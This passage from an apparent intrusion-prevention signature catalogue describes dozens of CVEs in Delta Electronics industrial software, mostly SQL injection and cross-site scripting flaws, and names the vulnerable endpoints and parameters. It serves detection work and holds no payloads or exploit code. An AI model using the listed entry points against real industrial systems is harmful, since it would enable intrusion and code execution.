Improper input validation when processing the type parameter in the AM_Handler.ashx endpoint causes an SQL injection vulnerability in Delta DIAEnergie. A successful attack may result in code execution with the privileges of NT SERVICE\MSSQLSERVER.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Am_Handler-SQL-Injection

References:

CVE-2021-38391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38391

Delta-Industrial-Automation-Diaenergie-Am_Handler-TP-SQL-Injection

About this vulnerability:	A vulnerability in Delta Electronics DIAEnergie
Risk:	Moderate
First detected in:	sgpkg-ips-1484-5242
Last changed:	sgpkg-ips-1484-5242
Platform:	Generic
Software:	Delta Electronics DIAEnergie
Type:	Input Validation
Description:	Insufficient input validation when processing tp parameters with requests sent to the AM_Handler.ashx endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary code on the target system with system privileges.
Situation:	HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Am_Handler-TP-SQL-Injection

Delta-Industrial-Automation-Diaenergie-Astlistparameters-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1723-5242

Last changed:

sgpkg-ips-1723-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation in the GetDIAE_astListParameters component causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit may allow an attacker to execute arbitrary SQL oe even gain the ability of remote code execution in the context of MSSQLSERVER.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Astlistparameters-SQL-Injection

References:

CVE-2024-28040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28040

Delta-Industrial-Automation-Diaenergie-Checkdiacloud-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1578-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Insufficient input validation when processing requests to the CheckDIACloud endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Checkdiacloud-SQL-Injection

References:

CVE-2022-41773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41773

Delta-Industrial-Automation-Diaenergie-Checkiothubnameexisted-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1527-5242

Last changed:

sgpkg-ips-1527-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Insufficient input validation in the CheckIoTHubNameExisted endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit can allow an attacker to execute arbitrary code with the privileges of SERVICE\MSSQLSERVER.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Checkiothubnameexisted-SQL-Injection

References:

CVE-2022-40967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40967

Delta-Industrial-Automation-Diaenergie-CVE-2021-32955-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1396-5242

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

There exists an arbitrary file upload vulnerability in Delta Industrial Automation DIAEnergie. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-CVE-2021-32955-Arbitrary-File-Upload

References:

CVE-2021-32955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32955

Delta-Industrial-Automation-Diaenergie-CVE-2022-41133-SQL-Injection

About this vulnerability:

A vulnerability in Delta Industrial Automation DIAEnergie.

Risk:

High

First detected in:

sgpkg-ips-1534-5242

Last changed:

sgpkg-ips-1534-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

SQL Injection

Description:

A vulnerability in Delta Industrial Automation DIAEnergie, versions before 1.9.01.002, which allows remote attackers to execute arbitrary code on the target server by sending a specially crafted request, due to insufficient input validation when processing requests to the GetDIAE_line_message_settingsListParameters endpoint.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-CVE-2022-41133-SQL-Injection

References:

CVE-2022-41133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41133

Delta-Industrial-Automation-Diaenergie-Diae_loopmaphandler.ashx-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

High

First detected in:

sgpkg-ips-1482-5242

Last changed:

sgpkg-ips-1482-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

An SQL injection has been reported in Delta Industrial Automation DIAEnergie. The vulnerability is due to insufficient input validation when processing requests to the DIAE_loopmapHandler.ashx endpoint. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request. Successful exploitation could result in the execution of arbitrary code on the target system within the context of NT SERVICE\MSSQLSERVER.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Diae_loopmaphandler.ashx-SQL-Injection

References:

CVE-2022-26887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26887

Delta-Industrial-Automation-Diaenergie-Diae_Phandler-Getobject-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1477-5242

Last changed:

sgpkg-ips-1477-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation for the pKid parameter in the DIAE_pgHandler.ashx endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute code as NT SERVICE\MSSQLSERVER.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Diae_Phandler-Getobject-SQL-Injection

References:

CVE-2022-1378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1378

Delta-Industrial-Automation-Diaenergie-Diae_taghandler.ashx-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1723-5242

Last changed:

sgpkg-ips-1723-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation in the DIAE_tagHandler.ashx script. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Diae_taghandler.ashx-SQL-Injection

References:

CVE-2024-25937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25937

Delta-Industrial-Automation-Diaenergie-Dmdsethandler-Order_By-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1504-5242

Last changed:

sgpkg-ips-1504-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper validation of the order_by parameter in DIAE_dmdsetHandler.ashx endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary code with the privileges of the SQL server.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Dmdsethandler-Order_By-SQL-Injection

References:

CVE-2022-26013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26013

Delta-Industrial-Automation-Diaenergie-Ftyinfosetting-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation in the FtyInfoSetting.aspx endpoint causes an SQL injection vulnerability in Delta DIAEnergie. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Ftyinfosetting-SQL-Injection

References:

CVE-2022-43452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43452

Delta-Industrial-Automation-Diaenergie-Getdiacloudlist-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1733-5242

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation in the GetDIACloudList endpoint. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of MSSQLSERVER.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Getdiacloudlist-SQL-Injection

References:

CVE-2024-34032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34032

Delta-Industrial-Automation-Diaenergie-GetDIAE_sloglistparameters-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation in the GetDIAE_slogListParameters component. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting these vulnerabilities could result in SQL injection or, in the worst case, remote code execution in the context of MSSQLSERVER.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-GetDIAE_sloglistparameters-SQL-Injection

References:

CVE-2024-23975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23975

Delta-Industrial-Automation-Diaenergie-GetDIAE_unListParameters-SQL-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Delta Industrial Automation DIAEnergie detected

Risk:

High

First detected in:

sgpkg-ips-1714-5242

Last changed:

sgpkg-ips-1714-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

A vulnerability in Delta Industrial Automation DIAEnergie, versions before 1.10.00.005, which allows remote attackers to execute arbitrary SQL commands, due to improper input validation in the GetDIAE_unListParameters component.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-GetDIAE_unListParameters-SQL-Injection

References:

CVE-2024-23494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23494

Delta-Industrial-Automation-Diaenergie-GetDIAE_usListParameters-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

High

First detected in:

sgpkg-ips-1712-5242

Last changed:

sgpkg-ips-1712-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation in the "GetDIAE_usListParameters" component. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting these vulnerabilities could result in SQL injection or, in the worst case, remote code execution in the context of MSSQLSERVER.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-GetDIAE_usListParameters-SQL-Injection

References:

CVE-2024-25574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25574

Delta-Industrial-Automation-Diaenergie-Handler-TCV-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie.

Risk:

High

First detected in:

sgpkg-ips-1480-5242

Last changed:

sgpkg-ips-1480-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

SQL Injection

Description:

A vulnerability in Delta Electronics DIAEnergie, versions prior to 1.8.02.004, which allows remote attackers to execute arbitrary SQL commands via specially crafted requests, due to insufficient input validation when processing requests to the Handler_TCV.ashx endpoint.

Situation:

HTTP_CS-Delta-Industrial-Automation-Diaenergie-Handler-TCV-SQL-Injection

References:

CVE-2022-1367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1367

Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1424-5242

Last changed:

sgpkg-ips-1424-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation when handling the name parameter in the HandlerAlarmGroup.ashx endpoint causes a cross-site scripting vulnerability in Delta DIAEnergie. A successful exploit allows an attacker to run arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-Stored-Cross-Site-Scripting

References:

CVE-2021-44471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44471

Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1387-5242

Last changed:

sgpkg-ips-1387-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper validation of the agid parameter in HandlerAlarmGroup.ashx endpoint of Delta Electronics DIAEnergie causes an SQL injection vulnerability which can be exploited to run arbitrary code within the context of NT SERVICE\MSSQLSERVER.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-SQL-Injection

References:

CVE-2021-38393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38393

Delta-Industrial-Automation-Diaenergie-Handlerchart.ashx-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

High

First detected in:

sgpkg-ips-1499-5242

Last changed:

sgpkg-ips-1499-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

An SQL injection has been reported in Delta Industrial Automation DIAEnergie. The vulnerability is due to insufficient input validation when processing requests to the HandlerChart.ashx endpoint. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request. Successful exploitation could result in the execution of arbitrary code on the target system within the context of NT SERVICE\MSSQLSERVER.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Handlerchart.ashx-SQL-Injection

References:

CVE-2022-1366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1366

Delta-Industrial-Automation-Diaenergie-HandlerEnergyType-Stored-CSS

About this vulnerability:

A vulnerability in Delta Industrial Automation DIAEnergie.

Risk:

High

First detected in:

sgpkg-ips-1428-5242

Last changed:

sgpkg-ips-1428-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

A vulnerability in Delta Industrial Automation DIAEnergie, versions 1.7.5 and before, which allows remote attackers to execute arbitrary scripts by sending a crafted request, due to an input validation error when processing parameters in HandlerEnergyType.ashx endpoint.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-HandlerEnergyType-Stored-CSS

References:

CVE-2021-44544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44544

Delta-Industrial-Automation-Diaenergie-Handlerenergytype.aspx-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

High

First detected in:

sgpkg-ips-1394-5242

Last changed:

sgpkg-ips-1394-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

An SQL injection has been reported in Delta Industrial Automation DIAEnergie. The vulnerability is due to input validation error when processing egyid parameter in HandlerEnergyType.ashx endpoint. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request. Successful exploitation could result in the execution of arbitrary code on the target system within context of NT SERVICE\MSSQLSERVER.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handlerenergytype.aspx-SQL-Injection

References:

CVE-2021-38390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38390

Delta-Industrial-Automation-Diaenergie-Handlerpagep_Kid-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1528-5242

Last changed:

sgpkg-ips-1528-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation for the HandlerPageP_KID process causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successfule exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handlerpagep_Kid-SQL-Injection

References:

CVE-2022-43774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43774

Delta-Industrial-Automation-Diaenergie-Handlertag_Kid-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

High

First detected in:

sgpkg-ips-1540-5242

Last changed:

sgpkg-ips-1540-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation for the HandlerTag_KID.ashx endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection. The vendor, Delta Industrial Automation, has not released an advisory regarding this vulnerability.

Situation:

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Handlertag_Kid-SQL-Injection

References:

CVE-2022-43775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43775

Delta-Industrial-Automation-Diaenergie-Handler_Cfg-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1389-5242

Last changed:

sgpkg-ips-1389-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation in the Handler_CFG.ashx endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary code on the target system within context of NT SERVICE\MSSQLSERVER.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handler_Cfg-SQL-Injection

References:

CVE-2021-32983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32983

Delta-Industrial-Automation-Diaenergie-Handler_Cfg-Visual_Q_Add-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1790-5242

Last changed:

sgpkg-ips-1790-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation in the Visual_Q_Add component of the Handler_CFG.ashx endpoint causes an SQL injection vulnerability in Delta DIAEnergie. A successful exploitation allows an attacker to execute SQL on the target system.

Situation:

File-Text_Delta-Industrial-Automation-Diaenergie-Handler_Cfg-Visual_Q_Add-SQL-Injection

References:

CVE-2024-42417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42417

Delta-Industrial-Automation-Diaenergie-Hierarchyhandler-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1426-5242

Last changed:

sgpkg-ips-1426-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper validation of parameters sent to the DIAE_hierarchyHandler.ashx endpoint causes a cross-site scripting vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Hierarchyhandler-Stored-Cross-Site-Scripting

References:

CVE-2021-31558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31558

Delta-Industrial-Automation-Diaenergie-Insertreg-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1547-5242

Last changed:

sgpkg-ips-1547-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation for the InsertReg process causes a cross-site scripting vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Insertreg-Stored-Cross-Site-Scripting

References:

CVE-2022-41702
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41702

Delta-Industrial-Automation-Diaenergie-Postenergytype-XSS

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1536-5242

Last changed:

sgpkg-ips-1536-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation for the PostEnergyType process. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

File-Text_Delta-Industrial-Automation-Diaenergie-Postenergytype-Stored-Cross-Site-Scripting

References:

CVE-2022-40965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40965

Delta-Industrial-Automation-Diaenergie-Putlinemessagesetting-Stored-XSS

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation of objects inincoming HTTP PUT requests causes a stored cross-site script vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Putlinemessagesetting-Stored-XSS

References:

CVE-2022-41555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41555

Delta-Industrial-Automation-Diaenergie-Putshift-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1535-5242

Last changed:

sgpkg-ips-1535-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation for the PutShift process causes a stored cross-site scripting vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Putshift-Stored-Cross-Site-Scripting

References:

CVE-2022-41701
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41701

Delta-Industrial-Automation-Diaenergie-Setpf-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1552-5242

Last changed:

sgpkg-ips-1552-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation for the SetPF process. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser. The vendor, Delta Industrial Automation, has not released an advisory regarding this vulnerability.

Situation:

File-Text_Delta-Industrial-Automation-Diaenergie-Setpf-Stored-Cross-Site-Scripting

References:

CVE-2022-41651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41651

Delta-Industrial-Automation-Diaenergie-SQL-Injection-CVE-2024-28891

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1725-5242

Last changed:

sgpkg-ips-1725-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

Improper input validation in the Handler_CFG.ashx script causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary SQL on the target system or even execute arbitrary code with the privileges of the SQL server.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-SQL-Injection-CVE-2024-28891

References:

CVE-2024-28891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28891

Delta-Industrial-Automation-Dialink-Events-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Delta Industrial Automation DIALink.

Risk:

High

First detected in:

sgpkg-ips-1462-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Generic

Software:

Delta Electronics DIALink

Type:

Input Validation

Description:

A vulnerability in Delta Industrial Automation DIALink, versions 1.3.1.0 and prior, which allows remote attackers to execute arbitrary scripts by sending crafted requests, due to input validation error when processing comment parameter in events endpoint.

Situation:

HTTP_CS-Delta-Industrial-Automation-Dialink-Events-Stored-Cross-Site-Scripting

References:

CVE-2021-38488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38488

Delta-Industrial-Automation-Dialink-Schedule-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Delta Electronics DIALink

Risk:

Moderate

First detected in:

sgpkg-ips-1434-5242

Last changed:

sgpkg-ips-1434-5242

Platform:

Generic

Software:

Delta Electronics DIALink

Type:

Input Validation

Description:

Improper processing of parameters sent to the schedule endpoint causes a cross-site scripting vulnerability in Delta Electronics DIALink. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Delta-Industrial-Automation-Dialink-Schedule-Stored-Cross-Site-Scripting

References:

CVE-2021-38428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38428

Delta-Industrial-Automation-Diascreen-Dpa-File-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Electronics DIAScreen

Risk:

Moderate

First detected in:

sgpkg-ips-1636-5242

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Delta Electronics DIAScreen

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in Delta Industrial Automation DIAScreen. The vulnerability is due to lack of proper validation of the length of user-supplied data prior to copying to a fixed-length stack buffer. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted DPA file. Successful exploitation could result in execution of arbitrary code under the security context of the current process.

Situation:

File-Binary_Delta-Industrial-Automation-Diascreen-Dpa-File-Parsing-Stack-Buffer-Overflow

References:

CVE-2023-0250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0250

Delta-Industrial-Automation-DOPSoft-DPS-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Industrial Automation DOPSoft.

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

Delta Industrial Automation DOPSoft

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability in Delta Industrial Automation DOPSoft, versions 2.00.07 and before, which allows remote attackers to execute arbitrary code by enticing a target user into opening a crafted DPS file, due to improper handling of the CWPFile section in DPS files.

Situation:

File-Binary_Delta-Industrial-Automation-DOPSoft-DPS-Stack-Buffer-Overflow

References:

CVE-2021-38402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38402

Delta-Industrial-Automation-DOPSoft-XLS-CFB-Header-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Delta Industrial Automation DOPSoft.

Risk:

High

First detected in:

sgpkg-ips-1421-5242

Last changed:

sgpkg-ips-1421-5242

Platform:

Generic

Software:

Delta Industrial Automation DOPSoft

Type:

Malfunction

Description:

A vulnerability in Delta Industrial Automation DOPSoft, versions 2.00.07 and prior, which allows remote attackers to execute arbitrary code by sending a crafted XLS file, due to the improper handling of the CFB file header in XLS files.

Situation:

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-CFB-Header-Parsing-Memory-Corruption

References:

CVE-2021-38406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38406

Delta-Industrial-Automation-DOPSoft-XLS-Index-Record-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Industrial Automation DOPSoft

Risk:

Moderate

First detected in:

sgpkg-ips-1425-5242

Last changed:

sgpkg-ips-1425-5242

Platform:

Generic

Software:

Delta Industrial Automation DOPSoft

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability has been reported in Delta Industrial Automation DOPSoft. The vulnerability is due to improper handling of Index records in XLS files. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted XLS file. Successful exploitation could result in execution of arbitrary code under the security context of the user running DOPSoft.

Situation:

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Index-Record-Parsing-Buffer-Overflow

References:

CVE-2021-38406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38406

Delta-Industrial-Automation-DOPSoft-XLS-Labelsst-Memory-Corruption

About this vulnerability:

A vulnerability in Delta Industrial Automation DOPSoft

Risk:

Moderate

First detected in:

sgpkg-ips-1439-5242

Last changed:

sgpkg-ips-1439-5242

Platform:

Generic

Software:

Delta Industrial Automation DOPSoft

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Delta Industrial Automation DOPSoft. The vulnerability is due to improper handling of the LabelSst records in XLS files. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted XLS file. Successful exploitation could result in execution of arbitrary code under the security context of the user running DOPSoft.

Situation:

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Labelsst-Memory-Corruption

References:

CVE-2021-38404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38404

Delta-Industrial-Automation-DOPSoft-XLS-Mulblank-Record-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Industrial Automation DOPSoft

Risk:

Moderate

First detected in:

sgpkg-ips-1409-5242
